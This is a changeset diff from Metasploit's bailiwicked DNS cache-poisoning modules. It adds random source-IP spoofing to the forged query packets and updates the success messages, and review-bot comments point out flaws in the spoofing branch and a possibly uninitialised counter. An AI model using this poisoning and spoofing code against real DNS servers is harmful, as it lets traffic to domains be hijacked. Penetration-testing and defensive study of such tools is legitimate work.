Changeset 5602
- Timestamp:
- 07/25/08 23:35:28 (2 months ago)
- Files:
framework3/trunk/modules/auxiliary/spoof/dns/bailiwicked_domain.rb
r5597 r5602 44 44 register_options( 45 45 [ 46 OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']), 46 47 OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), 47 48 OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), … … 137 138 target = rhost() 138 139 source = Rex::Socket.source_address(target) 140 saddr = datastore['SRCADDR'] 139 141 sport = datastore['SRCPORT'] 140 142 domain = datastore['DOMAIN'] + '.' … … 280 282 req.rd = 1 281 283 284 src_ip = source 285 286 if(saddr == 'Random') 287 src_ip = Rex::Text.rand_text(4).unpack("C4").join(".") 288 end 289 282 290 buff = ( 283 291 Scruby::IP.new( 284 #:src => barbs[0][:addr].to_s, 285 :src => source, 292 :src => src_ip, 286 293 :dst => target, 287 294 :proto => 17 … … 351 358 answer.each_answer do |name, ttl, data| 352 359 if((name.to_s + ".") == domain and data.name.to_s == newdns) 353 print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}")360 print_status("Poisoning successful after #{queries} queries and #{responses} responses: #{domain} == #{newdns}") 354 361 srv_sock.close 355 362 disconnect_ip … … 386 393 times = [] 387 394 388 hostname = Rex::Text.rand_text_alphanumeric(16) + domain395 hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain 389 396 390 397 sock = Rex::Socket.create_udp( … … 414 421 cnt = 0 415 422 416 hostname = Rex::Text.rand_text_alphanumeric(16) + domain423 hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain 417 424 418 425 Thread.critical = false framework3/trunk/modules/auxiliary/spoof/dns/bailiwicked_host.rb
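Review bot: In bailiwicked_domain.rb, the `if(saddr == 'Random')` branch builds `src_ip` from `Rex::Text.rand_text(4).unpack("C4").join(".")`, which draws all four octets from 0–255 with no constraint. The result can fall in 0.0.0.0/8, 127.0.0.0/8 or 224.0.0.0/4, or on an address that belongs to an unrelated host. Any path that enforces source-address validation (BCP 38 / uRPF) drops such packets, and the resolver's replies to the rest go to hosts that never sent a query. The option text should say so, for example `'The source address to use for sending the queries (Random forges an arbitrary, unvalidated IPv4 source)'`, with a one-line comment above the branch stating the same. The identical branch is added in bailiwicked_host.rb, and the enclosing method starts and ends outside the visible hunks.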
r5597 r5602 37 37 register_options( 38 38 [ 39 OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']), 39 40 OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), 40 41 OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']), … … 43 44 OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]), 44 45 OptInt.new('TTL', [true, 'The TTL for the malicious host entry', 31337]), 46 45 47 ], self.class) 46 48 … … 50 52 return { 51 53 "check" => "Determine if the specified DNS server (RHOST) is vulnerable", 52 "racer" => "Determine the size of the window for the target server" 54 "racer" => "Determine the size of the window for the target server", 53 55 } 54 56 end … … 130 132 target = rhost() 131 133 source = Rex::Socket.source_address(target) 134 saddr = datastore['SRCADDR'] 132 135 sport = datastore['SRCPORT'] 133 136 hostname = datastore['HOSTNAME'] + '.' … … 272 275 req.rd = 1 273 276 277 src_ip = source 278 279 if(saddr == 'Random') 280 src_ip = Rex::Text.rand_text(4).unpack("C4").join(".") 281 end 282 274 283 buff = ( 275 284 Scruby::IP.new( 276 #:src => barbs[0][:addr].to_s, 277 :src => source, 285 :src => src_ip, 278 286 :dst => target, 279 287 :proto => 17 … … 343 351 answer.each_answer do |name, ttl, data| 344 352 if((name.to_s + ".") == hostname and data.address.to_s == address) 345 print_status("Poisoning successful after #{queries} attempts: #{name} == #{address}")353 print_status("Poisoning successful after #{queries} queries and #{responses} responses: #{name} == #{address}") 346 354 disconnect_ip 347 355 return … … 375 383 times = [] 376 384 377 hostname = Rex::Text.rand_text_alphanumeric(16) + domain385 hostname = Rex::Text.rand_text_alphanumeric(16) + '.' 
+ domain 378 386 379 387 sock = Rex::Socket.create_udp( … … 403 411 cnt = 0 404 412 405 hostname = Rex::Text.rand_text_alphanumeric(16) + domain413 hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain 406 414 407 415 Thread.critical = false … … 455 463 avg_count 456 464 end 457 465 458 466 end 459 467 end
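Review bot: The new status line in bailiwicked_host.rb interpolates `#{responses}`, but no assignment to `responses` appears in any hunk of this changeset; the same applies to bailiwicked_domain.rb. If the counter is not initialised in the part of the method outside the hunk, the success path raises NameError before `disconnect_ip` runs. It is worth confirming that a `responses = 0` sits next to the `queries` initialisation. A short comment there saying what each counter counts would also help, since the message now reports both.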
